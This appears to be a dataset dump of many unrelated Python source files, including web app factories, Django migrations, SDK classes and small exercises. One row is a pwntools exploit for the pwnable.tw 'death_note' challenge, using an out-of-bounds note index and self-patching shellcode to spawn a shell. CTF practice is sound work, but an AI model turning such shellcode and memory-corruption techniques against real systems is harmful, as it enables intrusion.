text stringlengths 38 1.54M |
|---|
class Solution:
    def sumOddLengthSubarrays(self, arr: List[int]) -> int:
        """Return the sum of all odd-length contiguous subarrays of arr.

        O(n) contribution counting instead of summing every slice (O(n^3)):
        element i can start a subarray at any of left = i+1 positions and
        end it at any of right = n-i positions; the number of odd-length
        subarrays containing it is odd_l*odd_r + even_l*even_r.
        """
        n = len(arr)
        total = 0
        for i, value in enumerate(arr):
            left = i + 1           # choices of start index (0..i)
            right = n - i          # choices of end index (i..n-1)
            odd_l, even_l = (left + 1) // 2, left // 2
            odd_r, even_r = (right + 1) // 2, right // 2
            total += value * (odd_l * odd_r + even_l * even_r)
        return total
|
import logging
from fastapi import FastAPI
from starlette.staticfiles import StaticFiles
from app.api import ping, summaries
from app.db import init_db
from app.views import home
log = logging.getLogger("uvicorn")
def create_application() -> FastAPI:
    """Build and wire up the FastAPI application instance."""
    application = FastAPI()
    # Serve static assets from app/static under the matching URL path.
    application.mount(
        "/app/static", StaticFiles(directory="app/static"), name="static"
    )
    # API routers first, then the HTML views.
    application.include_router(ping.router)
    application.include_router(
        summaries.router, prefix="/summaries", tags=["summaries"]
    )
    application.include_router(home.router)
    return application
# Module-level ASGI app object that uvicorn imports.
app = create_application()
# NOTE(review): @app.on_event is deprecated in newer FastAPI versions in
# favour of lifespan handlers — confirm against the installed version.
@app.on_event("startup")
async def startup_event():
    """Initialise the database connection when the server starts."""
    log.info("Starting up...")
    init_db(app)
@app.on_event("shutdown")
async def shutdown_event():
    """Log shutdown; no resources are explicitly released here."""
    log.info("Shutting down...")
|
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from config import config
from flask_login import LoginManager
from sqlalchemy import MetaData, func
from flask_cors import CORS
# Format currency function for jinja templates (Put this in import)
def format_currency(value):
    """Render an integer cent amount as a dollar string: 12345 -> '$123.45'."""
    dollars = float(value) / 100
    return "${:,.2f}".format(dollars)
# Allows naming constraints to smooth db migrations
convention = {
    "ix": 'ix_%(column_0_label)s',
    "uq": "uq_%(table_name)s_%(column_0_name)s",
    "ck": "ck_%(table_name)s_%(column_0_name)s",
    "fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
    "pk": "pk_%(table_name)s"
}
metadata = MetaData(naming_convention=convention)
# Shared extension singletons; each is bound to the app in create_app().
db = SQLAlchemy(metadata=metadata)
bootstrap = Bootstrap()
moment = Moment()
# flask login global variables
login_manager = LoginManager()
login_manager.login_view = 'auth.login' # sets the view to redirect when non-logged in user tries to access protected page
# Application factory function
def create_app(config_name):
    """Application factory: build a Flask app configured by config[config_name].

    Binds the module-level extension singletons to the new app and registers
    the main and auth blueprints.
    """
    app = Flask(__name__)
    CORS(app)
    app.config.from_object(config[config_name])
    config[config_name].init_app(app)
    bootstrap.init_app(app)
    moment.init_app(app)
    db.init_app(app)
    login_manager.init_app(app)
    # Expose the currency formatter to Jinja templates under the name
    # 'format'.  NOTE(review): this shadows Python's builtin format() inside
    # templates — confirm intended.
    app.jinja_env.globals.update(format=format_currency)
    # Imported inside the factory, presumably to avoid circular imports
    # (blueprints typically import `db` from this module) — TODO confirm.
    from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)
    from .auth import auth as auth_blueprint
    app.register_blueprint(auth_blueprint, url_prefix='/auth')
    return app
|
from __future__ import print_function
import boto3
import json
print('Invoking updatePizzaMenu function')
def lambda_handler(event, context):
    """AWS Lambda entry point: set `selection` on one item of the Menus table.

    Expects `event` to carry 'menu_id' (the DynamoDB key) and 'selection'
    (the new value).  Returns the bare int 200; there is no error handling,
    so a missing key or a DynamoDB failure surfaces as an unhandled
    exception.
    """
    print ('printing event and context')
    print (event)
    print (event['menu_id'])
    table = boto3.resource('dynamodb').Table('Menus')
    table.update_item(
        Key={
            'menu_id': event['menu_id']
        },
        UpdateExpression='SET selection = :val1',
        ExpressionAttributeValues={
            ':val1': event['selection']
        }
    )
    return 200
# Представлен список чисел. Необходимо вывести элементы исходного списка, значения которых больше предыдущего элемента.
# Подсказка: элементы, удовлетворяющие условию, оформить в виде списка. Для формирования списка использовать генератор.
# Пример исходного списка: [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55].
# Результат: [12, 44, 4, 10, 78, 123].
import random
def Bigger_Elements(Array, N):
    """Print, space-separated, every element of Array[:N] that is strictly
    greater than its immediate predecessor.

    Bug fix: the original iterated range(1, N - 1) and therefore never
    examined the last element of the list.
    """
    for i in range(1, N):
        if Array[i] > Array[i - 1]:
            print(Array[i], end=" ")
if __name__ == '__main__':
    # Demo run: a shuffled permutation of 1..99 instead of the example
    # list from the task description above.
    Array = list(range(1, 100))
    random.shuffle(Array)
    N = len(Array)
    Bigger_Elements(Array, N)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-06-03 02:40
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import leprikon.models.fields
class Migration(migrations.Migration):
    """Create the RefundRequest model.

    One refund request per subject registration (OneToOneField, PROTECT),
    recording the requesting user and the bank account for the payout.
    Auto-generated by Django 1.11.29 — do not hand-edit applied migrations.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("leprikon", "0060_transactions"),
    ]
    operations = [
        migrations.CreateModel(
            name="RefundRequest",
            fields=[
                ("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
                (
                    "requested",
                    models.DateTimeField(
                        default=django.utils.timezone.now, editable=False, verbose_name="requested time"
                    ),
                ),
                ("bank_account", leprikon.models.fields.BankAccountField(verbose_name="bank account number")),
                (
                    "registration",
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="refund_request",
                        to="leprikon.SubjectRegistration",
                        verbose_name="registration",
                    ),
                ),
                (
                    "requested_by",
                    models.ForeignKey(
                        editable=False,
                        null=True,
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="+",
                        to=settings.AUTH_USER_MODEL,
                        verbose_name="requested by",
                    ),
                ),
            ],
            options={
                "verbose_name": "refund request",
                "verbose_name_plural": "refund requests",
                "ordering": ("requested",),
            },
        ),
    ]
|
from __future__ import print_function
import subprocess
import os
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('base',
help='location of directory containing larpix-scripts, '
'larpix-control, etc.')
args = parser.parse_args()
def git_describe(directory):
    """Return `git describe --always --long` output for the repo at *directory*.

    Uses check_output's cwd= parameter instead of os.chdir so the caller's
    working directory is left untouched even when the git call raises
    (the original would not chdir back on CalledProcessError).
    """
    output = subprocess.check_output(
        ['git', 'describe', '--always', '--long'], cwd=directory)
    return output.decode()
def git_diff(directory):
    """Return the uncommitted `git diff` for the repo at *directory*.

    Uses check_output's cwd= parameter instead of os.chdir so the caller's
    working directory is left untouched even when the git call raises.
    """
    output = subprocess.check_output(['git', 'diff'], cwd=directory)
    return output.decode()
def pip_show(package):
    """Return the decoded text of `pip show <package>`."""
    return subprocess.check_output(['pip', 'show', package]).decode()
# Collect platform info, repo versions/diffs and pip metadata into
# bugreport.txt so a maintainer can reproduce the reporter's setup.
to_save = []
print('Preparing bug report')
print('Collecting system info')
to_save.append('Platform: ' + sys.platform)
current_dir = os.getcwd()
# Run all repo queries relative to the user-supplied base directory.
os.chdir(args.base)
to_save.append('larpix-control HEAD: ' + git_describe('larpix-control'))
to_save.append('larpix-control diff:\n' + git_diff('larpix-control'))
to_save.append('larpix-scripts HEAD: ' + git_describe('larpix-scripts'))
to_save.append('larpix-scripts diff:\n' + git_diff('larpix-scripts'))
to_save.append('pip show larpix-control:\n' +
               pip_show('larpix-control'))
to_save.append('pip show larpix-geometry:\n' +
               pip_show('larpix-geometry'))
os.chdir(current_dir)
outfile = 'bugreport.txt'
with open(outfile, 'w') as f:
    print('Saving to: ' + os.path.abspath(f.name))
    f.write('\n'.join(to_save))
|
from app import db
from app.main import bp
from flask import render_template, request, redirect, jsonify
from flask_login import login_required, current_user
from app.main.forms import CreateOrder
from app.models import OrderTypes, Tag, Order
from werkzeug.utils import secure_filename
from config import Config
import os
import subprocess
import random
import speech_recognition as sr
import json
@bp.route('/', methods=['GET', 'POST'])
@login_required
def index():
    """Dashboard: list the user's orders and handle new-order submission.

    GET renders the page; a valid POST of CreateOrder builds an Order from
    the form (including dynamic 'field-*' inputs) and redirects back to the
    referring page.
    """
    title = 'Главная'
    # Orders the current user created
    orders_iam_creator = current_user.get_orders_iam_creator()
    # Orders assigned to the current user
    orders_iam_executor = current_user.get_orders_iam_executor()
    create_order_form = CreateOrder()
    # Populate the select choices from the DB on every request.
    for order_type in OrderTypes.query.all():
        create_order_form.type.choices.append((str(order_type.id), order_type.title))
    for tag in Tag.query.all():
        create_order_form.executors.choices.append((str(tag.id), tag.name))
    if create_order_form.validate_on_submit():
        all_fields = request.form
        custom_fields = {}
        # Collect the dynamic inputs whose dash-separated name contains
        # a 'field' segment.
        for field in all_fields:
            if 'field' in field.split('-'):
                custom_fields[field.split('-')[0]] = all_fields[field]
        order = Order()
        order.creator = current_user.id
        order.title = create_order_form.title.data
        order.description = create_order_form.description.data
        order.description_sound = create_order_form.file.data
        order.priority = create_order_form.priority.data
        order.type = create_order_form.type.data
        order.interval = create_order_form.interval.data
        order.deadline = create_order_form.deadline.data
        order.status = 1
        # Every user carrying the selected tag becomes an executor.
        tag = Tag.query.filter(Tag.id == create_order_form.executors.data).first()
        for user in tag.users:
            order.executors.append(user)
        # NOTE(review): the dynamic custom fields are stored in `reactions`
        # as JSON — confirm this field name is intended.
        order.reactions = json.dumps(custom_fields)
        db.session.add(order)
        db.session.commit()
        return redirect(request.referrer)
    return render_template('main/index.html',
                           title=title,
                           create_order_form=create_order_form,
                           orders_iam_creator=orders_iam_creator,
                           orders_iam_executor=orders_iam_executor)
@bp.route('/recognize_file', methods=['GET', 'POST'])
def recognize_file():
    """Accept an uploaded voice message and return its Russian transcript.

    Saves the upload under a random numeric prefix, converts it to WAV with
    ffmpeg, runs Google speech recognition on it, and responds with the
    text plus the numeric file id.
    """
    if request.method == 'POST':
        # print(request.files)
        voice_rec = request.files['audio'] # take the audio file from the POST request
        # Random prefix to avoid clobbering same-named uploads.
        # NOTE(review): collisions are still possible, the ffmpeg call is
        # unchecked, and neither the ogg nor the wav file is cleaned up.
        rand = str(random.randint(100000,1000000))
        filename = rand + secure_filename(voice_rec.filename)
        voice_rec.save(os.path.join(Config.UPLOAD_FOLDER, filename))
        subprocess.run(['ffmpeg', '-i', os.path.join(Config.UPLOAD_FOLDER, filename), os.path.join(Config.UPLOAD_FOLDER, filename.replace('ogg', 'wav'))])
        with sr.AudioFile(os.path.join(Config.UPLOAD_FOLDER, filename.replace('ogg', 'wav'))) as s:
            r = sr.Recognizer()
            txt = r.listen(s)
            text = r.recognize_google(txt, language = 'ru-RU')
        return jsonify({'stt': text, 'file_id': int(rand)})
|
# card data comes from:
# http://hearthstonejson.com/
# last updated: August 7th, 2014
# mechanics: Taunt, Stealth, Divine Shield, Windfury, Freeze, Enrage,
# HealTarget, Charge, Deathrattle, Aura, Combo, AdjacentBuff, Battlecry,
# Poisonous, Spellpower
from json import loads
from card_types import MinionCard, SpellCard
def get_all_cards():
    """Load AllSets.json and return a flat list of all card dicts.

    Uses a context manager so the file handle is closed (the original
    left `open(...)` unclosed).
    """
    with open('AllSets.json') as f:
        raw_cards = loads(f.read())
    cards = []
    for val in raw_cards.values():
        cards += val
    return cards
def card_id_map():
    """Load AllSets.json and return a {card_id: card dict} mapping.

    Uses a context manager so the file handle is closed (the original
    left `open(...)` unclosed).
    """
    with open('AllSets.json') as f:
        raw_cards = loads(f.read())
    return {card['id']: card
            for card_chunk in raw_cards.values()
            for card in card_chunk}
cards = get_all_cards()
def get_card(card_name, owner):
    """Find the card named *card_name* and build the matching card object.

    Returns a MinionCard or SpellCard owned by *owner*; prints an error and
    returns None when no card matches.

    NOTE(review): WeaponCard is never imported in this module (only
    MinionCard and SpellCard are), so the Weapon branch raises NameError if
    it is ever reached.
    """
    for card in cards:
        if card.get('name') == card_name:
            params = {'name': card.get('name'),
                      'neutral_cost': card.get('cost', 0),
                      'owner': owner,
                      'card_id': card.get('id')}
            if card.get('type') == 'Minion':
                params['attack'] = card.get('attack')
                params['health'] = card.get('health')
                params['mechanics'] = card.get('mechanics', [])
                params['race'] = card.get('race')
                return MinionCard(**params)
            elif card.get('type') == 'Spell':
                return SpellCard(**params)
            elif card.get('type') == 'Weapon':
                params['attack'] = card.get('attack')
                params['durability'] = card.get('durability')
                return WeaponCard(**params)
    print('ERROR: CARD NOT FOUND')
def get_deck(names, owner):
    """Build a list of card objects, one per name, all owned by *owner*."""
    deck = []
    for card_name in names:
        deck.append(get_card(card_name, owner))
    return deck
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding=utf-8
class RequestBase:
    """Common state shared by all MNS request objects."""

    def __init__(self):
        # HTTP verb; concrete subclasses overwrite this.
        self.method = ""
        # Optional caller-supplied request id for tracing.
        self.request_id = None

    def set_req_info(self, req_info):
        """Copy the request id from *req_info* when one is present."""
        if req_info is None:
            return
        if req_info.request_id is not None:
            self.request_id = req_info.request_id
class ResponseBase:
    """Common state shared by all MNS response objects."""

    def __init__(self):
        self.status = -1       # HTTP status; -1 until a response arrives
        self.header = {}       # raw response headers
        self.error_data = ""   # body of an error response, if any

    def get_requestid(self):
        """Return the server-assigned request id header, or None."""
        return self.header.get("x-mns-request-id")
class BatchReceiveMessageRequest(RequestBase):
    """GET request pulling up to *batch_size* messages from *queue_name*."""

    def __init__(self, queue_name, batch_size, base64decode=True, wait_seconds=-1):
        RequestBase.__init__(self)
        self.method = "GET"
        self.queue_name = queue_name
        self.batch_size = batch_size
        self.base64decode = base64decode
        # -1 means: do not long-poll.
        self.wait_seconds = wait_seconds
class ReceiveMessageResponseEntry:
    """One received message plus its queue metadata.

    All fields start as sentinel values (-1 / empty string) and are filled
    in when a response is parsed.
    """

    def __init__(self):
        self.message_id = ""
        self.message_body = ""
        self.message_body_md5 = ""
        self.receipt_handle = ""
        self.next_visible_time = ""
        self.priority = -1
        self.dequeue_count = -1
        self.enqueue_time = -1
        self.first_dequeue_time = -1
class BatchReceiveMessageResponse(ResponseBase):
    """Response wrapper carrying the received message entries."""

    def __init__(self):
        ResponseBase.__init__(self)
        # Parsed message entries; starts empty.
        self.message_list = []
class BatchDeleteMessageRequest(RequestBase):
    """DELETE request removing the messages named by *receipt_handle_list*."""

    def __init__(self, queue_name, receipt_handle_list):
        RequestBase.__init__(self)
        self.method = "DELETE"
        self.queue_name = queue_name
        self.receipt_handle_list = receipt_handle_list
class BatchDeleteMessageResponse(ResponseBase):
    """Response for a batch delete; no fields beyond the base class."""

    def __init__(self):
        ResponseBase.__init__(self)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import codecs, re
def load_analogy_pair(fname):
    """Read an analogy file and return (pairs, neutral_words).

    Each non-blank line is '<key>\\t<space-separated tokens>'.  Tokens on
    'pairs' lines look like 'a/b' and are returned as tuples; tokens under
    any other key are collected as plain strings.
    """
    ap_dict = defaultdict(list)
    with codecs.open(fname, 'r', encoding='utf-8', errors='ignore') as f:
        raw = f.read()
    for line in re.split('[\r\n]+', raw):
        stripped = line.strip()
        if not stripped:
            continue
        fields = stripped.split('\t')
        key = fields[0]
        for token in fields[1].split(' '):
            if key == 'pairs':
                ap_dict[key].append(tuple(token.split('/')))
            else:
                ap_dict[key].append(token)
    return ap_dict['pairs'], ap_dict['neutral_words']
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 15 00:52:59 2021
@author: glenn

Groups Ontario COVID case rows by reporting region, sorts each region's
cases by date, and pickles the results.
"""
#%% - import libraries
import pandas
import time
import pickle
from local_module import fcts
#%% input / output paths
RAW_CASE_DATA = 'raw_cases/conposcovidloc.csv'
SORTED_CASES = 'pickled_cases/sorted_data_per_region.obj'
REGION_LABELS = 'pickled_cases/region_labels.obj'
#%% - read the case data into pandas dataframe
phuDailys = pandas.read_csv(RAW_CASE_DATA)
phuDailys['Date'] = pandas.to_datetime(phuDailys['Accurate_Episode_Date']).dt.date
phu_df = phuDailys[['Reporting_PHU_ID', 'Outcome1', 'Date']]
#%% - find all distinct region labels
region_labels = list(set(phu_df['Reporting_PHU_ID']))
num_regions = len(region_labels)
#%% - insert case reports from raw case data into lists per region
# - single pass over the frame: the original rescanned every row once per
#   region (O(regions * rows), reported >1000 s); one pass is O(rows) and
#   preserves the same per-region row order
t0 = time.perf_counter()
data = dict()
for region in region_labels:
    data[region] = list()
for row in phu_df.iterrows():
    data[row[1]['Reporting_PHU_ID']].append(row[1])
t1 = time.perf_counter()
print('cell took ', str(t1 - t0), ' seconds to complete')
#%% - sort all in the dict by case by date
for region in data:
    dataset = data[region]
    # dataset is a list of pandas series objects that need to be sorted by date
    dataset.sort(key=fcts.pd_series_date)
#%% - Save sorted data to pickled object
with open(SORTED_CASES, 'wb') as f:
    pickle.dump(data, f)
#%% - save region label to pickled object
with open(REGION_LABELS, 'wb') as f:
    pickle.dump(region_labels, f)
|
# CTF exploit for the pwnable.tw "death_note" challenge.
# NOTE(review): concatenating asm() output with the str "M" (below) only
# works on Python 2-era pwntools, where asm() returns str — confirm before
# running under Python 3.
from pwn import *
#context.arch = "amd64"
p = remote("chall.pwnable.tw",10201)
#p = process("./death_note")
def add(idx,name):
    """Menu option 1: store `name` in the note slot at `idx`."""
    p.sendlineafter("Your choice :","1")
    p.sendlineafter("Index :",str(idx))
    p.sendlineafter("Name :",str(name))
def show(idx):
    """Menu option 2: print the note at `idx`."""
    p.sendlineafter("Your choice :","2")
    p.sendlineafter("Index :",str(idx))
def delete(idx):
    """Menu option 3: free the note at `idx` (triggers its execution)."""
    p.sendlineafter("Your choice :","3")
    p.sendlineafter("Index :",str(idx))
def exit():
    # NOTE(review): shadows the builtin exit(); menu option 4 on the target.
    p.sendlineafter("Your choice :","4")
# Printable/alphanumeric-safe x86 stub that patches itself at runtime
# (the xor [ebx+...] writes) before falling through.
shellcode = asm("pop ebp;pop ebx;push 0x7e;pop eax;inc eax;inc eax;xor [ebx+0x2a],eax;xor [ebx+0x2b],eax;push ecx;pop eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;")
#shellcode = asm("pop ebp;pop ebx;pop eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax; push 0x7e;pop edx;inc edx;inc edx;xor [ebx+0x2b],edx;xor [ebx+0x2c],edx;pop edx;pop edx;pop edx;pop edx;")
add(0,"/bin/sh\x00")
# Negative index -19 writes out of bounds relative to the note array.
add(-19,shellcode + "M")
#gdb.attach(p)
delete(0)
p.interactive()
|
{'application':{'type':'Application',
'name':'StackWidgetsTest',
'backgrounds': [
{'type':'Background',
'name':'bgWidgets',
'title':'Widgets Test',
'size':(800, 600),
'menubar': {'type':'MenuBar',
'menus': [
{'type':'Menu',
'name':'File',
'label':'&File',
'items': [
{'type':'MenuItem',
'name':'menuFileDumpWidgets',
'label':'Create Components Docs...',
},
{'type':'MenuItem',
'name':'menuFileExit',
'label':'E&xit\tAlt+X',
'command':'exit',
},
]
},
]
},
'components': [
{'type':'ToggleButton',
'name':'chkToggleButton',
'position':(100, 225),
'size':(85, -1),
'label':'ToggleButton',
},
{'type':'StaticText',
'name':'labelToggleButton',
'position':(5, 230),
'text':'ToggleButton:',
},
{'type':'StaticText',
'name':'labelBitmapCanvas',
'position':(476, 496),
'text':'BitmapCanvas:',
},
{'type':'BitmapCanvas',
'name':'bmpBitmapCanvas',
'position':(566, 494),
'size':(112, 50),
'backgroundColor':(255, 255, 255),
},
{'type':'StaticText',
'name':'labelHtmlWindow',
'position':(546, 264),
'text':'HtmlWindow:',
},
{'type':'HtmlWindow',
'name':'htmHtmlWindow',
'position':(540, 288),
'size':(195, 150),
'backgroundColor':(255, 255, 255),
'text':'widgets.html',
},
{'type':'StaticBox',
'name':'stbStaticBox',
'position':(563, 449),
'size':(116, 32),
'label':'A StaticBox',
},
{'type':'StaticText',
'name':'labelStaticBox',
'position':(498, 460),
'text':'StaticBox:',
},
{'type':'StaticText',
'name':'labelSpinner',
'position':(228, 450),
'text':'Spinner:',
},
{'type':'Spinner',
'name':'spnSpinner',
'position':(310, 450),
'max':100,
'min':1,
'value':93,
},
{'type':'StaticText',
'name':'labelGauge',
'position':(228, 408),
'text':'Gauge:',
},
{'type':'Gauge',
'name':'gagGauge',
'position':(310, 404),
'size':(128, -1),
'layout':'horizontal',
'max':100,
'value':50,
},
{'type':'Calendar',
'name':'calCalendar',
'position':(299, 200),
},
{'type':'StaticText',
'name':'labelCalendar',
'position':(228, 260),
'text':'Calendar:',
},
{'type':'ComboBox',
'name':'cmbComboBox',
'position':(311, 364),
'size':(125, -1),
'items':['one', 'two', 'three'],
'stringSelection':'two',
'text':'two',
},
{'type':'StaticText',
'name':'labelComboBox',
'position':(228, 370),
'text':'ComboBox:',
},
{'type':'StaticBox',
'name':'StaticBox1',
'position':(543, 10),
'size':(250, 242),
'label':'Attributes',
},
{'type':'StaticLine',
'name':'staticMenuUnderline',
'position':(0, 0),
'size':(800, -1),
'layout':'horizontal',
},
{'type':'CheckBox',
'name':'chkEnabled',
'position':(550, 30),
'checked':True,
'label':'Enabled',
},
{'type':'CheckBox',
'name':'chkVisible',
'position':(550, 50),
'checked':True,
'label':'Visible',
},
{'type':'CheckBox',
'name':'chkEditable',
'position':(550, 70),
'checked':True,
'label':'Editable',
},
{'type':'Button',
'name':'btnBackgroundColor',
'position':(550, 95),
'label':'BackgroundColor',
},
{'type':'Button',
'name':'btnForegroundColor',
'position':(550, 125),
'label':'ForegroundColor',
},
{'type':'Button',
'name':'btnFont',
'position':(550, 155),
'label':'Font',
},
{'type':'Button',
'name':'btnToolTip',
'position':(550, 185),
'label':'ToolTip',
},
{'type':'Button',
'name':'btnBgBackgroundColor',
'position':(550, 215),
'label':'Background BackgroundColor',
},
{'type':'StaticText',
'name':'labelButton',
'position':(5, 5),
'text':'Button:',
},
{'type':'StaticText',
'name':'labelTextField',
'position':(5, 35),
'text':'TextField:',
},
{'type':'StaticText',
'name':'labelPasswordField',
'position':(5, 65),
'text':'PasswordField:',
},
{'type':'StaticText',
'name':'labelTextArea',
'position':(5, 95),
'text':'TextArea:',
},
{'type':'StaticText',
'name':'labelStaticText',
'position':(5, 170),
'text':'StaticText:',
},
{'type':'StaticText',
'name':'labelCheckBox',
'position':(5, 200),
'text':'CheckBox:',
},
{'type':'StaticText',
'name':'labelRadioGroup',
'position':(5, 260),
'text':'RadioGroup:',
},
{'type':'StaticText',
'name':'labelChoice',
'position':(5, 360),
'text':'Choice:',
},
{'type':'StaticText',
'name':'labelList',
'position':(5, 390),
'text':'List:',
},
{'type':'StaticText',
'name':'labelSlider',
'position':(5, 490),
'text':'Slider:',
},
{'type':'StaticText',
'name':'labelStaticLine',
'position':(5, 520),
'text':'StaticLine:',
},
{'type':'StaticText',
'name':'labelImage',
'position':(315, 5),
'text':'Image:',
},
{'type':'StaticText',
'name':'labelImageButton',
'position':(315, 110),
'text':'ImageButton:',
},
{'type':'TextField',
'name':'fldTextFieldNoBorder',
'position':(315, 150),
'size':(180, -1),
'border':'none',
'text':'TextField with no border',
},
{'type':'Button',
'name':'btnButton',
'position':(100, 4),
'label':'Button',
},
{'type':'TextField',
'name':'fldTextField',
'position':(100, 32),
'size':(180, -1),
},
{'type':'PasswordField',
'name':'fldPasswordField',
'position':(100, 62),
'size':(180, -1),
},
{'type':'TextArea',
'name':'fldTextArea',
'position':(100, 92),
'size':(180, 60),
'text':'Use the checkboxes and buttons on the right to set the attributes of the widgets on the left.\n\nThe editable attribute only applies to TextField, PasswordFiled, and TextArea.',
},
{'type':'StaticText',
'name':'txtStaticText',
'position':(100, 170),
'text':'StaticText',
},
{'type':'CheckBox',
'name':'chkCheckBox',
'position':(100, 200),
'label':'CheckBox',
},
{'type':'RadioGroup',
'name':'radRadioGroup',
'position':(100, 260),
'items':['one', 'two', 'three'],
'label':'A RadioBox',
'layout':'vertical',
'max':1,
'stringSelection':'one',
},
{'type':'Choice',
'name':'popChoice',
'position':(100, 360),
'items':['one', 'two', 'three'],
'stringSelection':'two',
},
{'type':'List',
'name':'lstList',
'position':(100, 390),
'size':(-1, 70),
'items':['one', 'two', 'three'],
'stringSelection':'three',
},
{'type':'Slider',
'name':'sldSlider',
'position':(100, 490),
'size':(200, 20),
'layout':'horizontal',
'max':100,
'min':1,
'value':1,
},
{'type':'StaticLine',
'name':'linStaticLine',
'position':(100, 520),
'size':(200, -1),
'layout':'horizontal',
},
{'type':'ImageButton',
'name':'imgImageButton',
'position':(405, 110),
'border':'transparent',
'file':'edit.gif',
},
{'type':'Image',
'name':'imgImage',
'position':(385, 5),
'file':'tile.bmp',
},
] # end components
} # end background
] # end backgrounds
} }
|
# Generated by Django 2.1.1 on 2018-10-08 08:36
import DjangoUeditor.models
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated (Django 2.1.1): set Chinese verbose names on several
    models and alter customerappraise/product fields.

    Do not hand-edit applied migrations.
    """

    dependencies = [
        ('polls', '0012_customerappraise'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='article',
            options={'verbose_name': '资讯内容页', 'verbose_name_plural': '资讯内容页'},
        ),
        migrations.AlterModelOptions(
            name='consult',
            options={'verbose_name': '客户咨询', 'verbose_name_plural': '客户咨询'},
        ),
        migrations.AlterModelOptions(
            name='mainmanu',
            options={'verbose_name': '一级分类菜单', 'verbose_name_plural': '一级分类菜单'},
        ),
        migrations.AlterModelOptions(
            name='product',
            options={'verbose_name': '产品内容页', 'verbose_name_plural': '产品内容页'},
        ),
        migrations.AlterModelOptions(
            name='secondarymanu',
            options={'verbose_name': '二级分类菜单', 'verbose_name_plural': '二级分类菜单'},
        ),
        migrations.AlterField(
            model_name='customerappraise',
            name='customer_appraise',
            field=models.CharField(max_length=2000, verbose_name='评价内容'),
        ),
        migrations.AlterField(
            model_name='customerappraise',
            name='customer_logo',
            field=models.ImageField(upload_to='customers', verbose_name='客户LOGO'),
        ),
        migrations.AlterField(
            model_name='product',
            name='content',
            field=DjangoUeditor.models.UEditorField(blank=True, verbose_name='内容'),
        ),
        migrations.AlterField(
            model_name='product',
            name='mainPhoto',
            field=models.ImageField(upload_to='products', verbose_name='上传主图'),
        ),
        migrations.AlterField(
            model_name='product',
            name='mainmanu',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='polls.MainManu', verbose_name='选择一级类目'),
        ),
        migrations.AlterField(
            model_name='product',
            name='pub_date',
            field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='发布日期'),
        ),
        migrations.AlterField(
            model_name='product',
            name='secondarymanu',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='polls.SecondaryManu', verbose_name='选择二级类目'),
        ),
        migrations.AlterField(
            model_name='product',
            name='update_date',
            field=models.DateTimeField(auto_now=True, verbose_name='更新日期'),
        ),
    ]
|
import time
import queue
import threading
from SQS import *
# Shared ingredient stock: consumed by the taquero threads, refilled by the
# restock thread.
ingredientes = {"Guacamole": 500, "Cebolla": 500, "Cilantro": 500, "Frijoles": 500, "Salsa": 500}
# Response-time samples keyed by order size (small/medium/large).
responseTimes = {"Pequeño": [], "Mediano": [], "Grande": []}
# Tortilla stock per station: [asada/tripa, adobada/lengua, cabeza/suadero/veggie].
tortillas = [500, 500, 500]
# Global queues
queue_asada_tripa = queue.Queue()
queue_adobada_lengua = queue.Queue()
queue_cabeza_suadero_veggie = queue.Queue()
orders_in_progress = {}
distributed_orders = {}
# Orders in progress format, see order_in_proges_format.txt in extras
# Thread resource lock
lock = threading.Lock()
def rellenarIngredientes():
    """Restock thread: every 5 s, top up the scarcest ingredient and tortillas.

    Runs forever.  Uses `with lock:` instead of manual acquire/release so
    the lock is always released even if an exception escapes the critical
    section (the original would deadlock every other thread in that case).
    """
    while True:
        time.sleep(5)
        with lock:
            # Only the single most depleted ingredient is refilled per tick.
            short_ingredient = min(ingredientes, key=ingredientes.get)
            if ingredientes[short_ingredient] <= 450:
                ingredientes[short_ingredient] += 50
            tortillas[0] += 5
            tortillas[1] += 5
            tortillas[2] += 5
def mesero(listaOrdenes):
    """Takes orders and submits them to appropriate queue.

    Polls *listaOrdenes* once per second; for each order it registers
    bookkeeping in the shared dicts and routes every suborder to the taquero
    queue matching its meat type.
    """
    while True:
        print("Mesero", len(listaOrdenes))
        if len(listaOrdenes) > 0:
            orden = listaOrdenes.pop(0)
            distributed_orders[orden["request_id"]] = orden
            # "size" counts unfinished suborders; the order is done at 0.
            orders_in_progress[orden["request_id"]] = {
                "size": len(orden["orden"]),
                "start_time": orden["datetime"],
                "steps": [],
            }
            for suborder in orden["orden"]:
                orders_in_progress[orden["request_id"]][suborder["part_id"]] = {
                    "finish_state": False,
                    "quantity": suborder["quantity"]
                }
                meat_type = suborder["meat"]
                print(meat_type)
                # Route by meat to the station that stocks it.
                if meat_type == "Asada" or meat_type == "Tripa":
